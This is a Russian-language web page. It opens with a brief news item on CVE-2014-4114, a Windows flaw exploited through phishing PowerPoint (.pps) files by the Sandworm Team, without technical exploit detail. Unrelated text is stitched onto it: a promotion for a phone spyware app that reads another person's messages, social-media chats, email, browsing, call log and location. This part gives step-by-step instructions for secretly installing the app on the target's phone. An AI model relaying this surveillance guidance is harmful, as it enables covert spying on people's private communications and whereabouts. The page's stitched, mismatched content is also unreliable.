Для фишинга могут использоваться файлы MS PowerPoint

dd63f3d4d2fa9e0c7552b3288ac74e90

Представители исследовательской организации Fidelis Cybersecurity изучили множественные случаи взлома безопасности Microsoft Windows. Распространённая уязвимость с кодом CVE-2014-4114 эксплуатировалась много раз. Злоумышленники весьма успешно использовали обход защиты антивирусов. Вне зависимости от того, какое именно антивирусное ПО использовалось на компьютере жертвы. Чтобы произошло общее заражение системы, пользователю достаточно запустить файл с презентацией MS PowerPoint.

Эта брешь в защите обнаружена в версиях ОС Windows Vista, Windows Server 2008, Windows 7, Windows 8, Windows 8.1, Windows Server 2012, а также Windows RT 8.1. Корпорация Microsoft уже выпустила необходимый патч. Первые признаки появились летом-осенью прошлого года, когда хакерская группировка Sandworm Team использовала обнаруженную уязвимость для проведения целевых атак на различные компьютеры. В основном это не атака на отдельных юзеров, а нападение на серверы.

Теперь уязвимость стала известна широкой общественности. Фишинговые атаки начинаются с рассылок на электронные ящики жертв файлов-презентаций MS PowerPoint, имеющих расширение .pps. Если жертва открывает такое письмо, то происходит заражение компьютера. Фишинговый файл способен запрашивать различную информацию, а порой и самостоятельно собирать её из системы. Защититься от этого можно лишь собственной внимательностью. Не скачивайте сомнительные файлы из электронных писем!

Возможности приложения: чтение переписки SMS, MMS, Вконтакте (официальное приложение и Kate Mobile), Одноклассники, Facebook, Мой Мир@mail.ru, ВСети.by, Twitter, Hangouts, Google+, WhatsApp, Skype, Viber, Hangouts (бывший Google Talk), Агент@mail.ru, ICQ, IM+ и IM+Pro, AIM, Jabber, MSN, MySpace, Yahoo! и Я.Онлайн (Яндекс Чат), Email переписку Gmail и Почта@mail.ru, просматривать посещенные сайты в браузерах Chrome, Opera, Firefox. Получить доступ к списку звонков и местонахождению телефона. Это малая часть всех возможностей. Весь список возможностей доступен тут

Видео руководство по установке для любого телефона:

Видео руководство по установке на телефон с ROOT правами:

Инструкция по установке и настройке:

  1. Заводим личный кабинет по этой ссылке: «Завести личный кабинет» (просто регистрируемся там).
  2. Заходим по этой ссылке: «Войти в личный кабинет на сайте» и вводим Email и пароль, которые указали пре регистрации.
  3. Жмем кнопку: «Добавить телефон»
  4. Заполняем все поля которые просят ввести. Заполняем правильно как там написано, иначе не будет работать.
  5. Жмем кнопку «Сохранить».
  6. Читаем инструкцию которая появилась после нажатия кнопки «Сохранить»
  7. Устанавливаем на телефон, (тот с которого нужно получить информацию) приложение, и настраиваем его согласно инструкции, которую вы должны будете прочитать на шаге 6.
  8. Приложение установлено. Все хорошо. Разработчики пишут, что надо подождать не менее часа, чтоб данные начали поступать в ваш личный кабинет который вы завели на шаге 1. В нашем случае данные пришли через 4 часа. Задуманное удалось! Желаю успехов.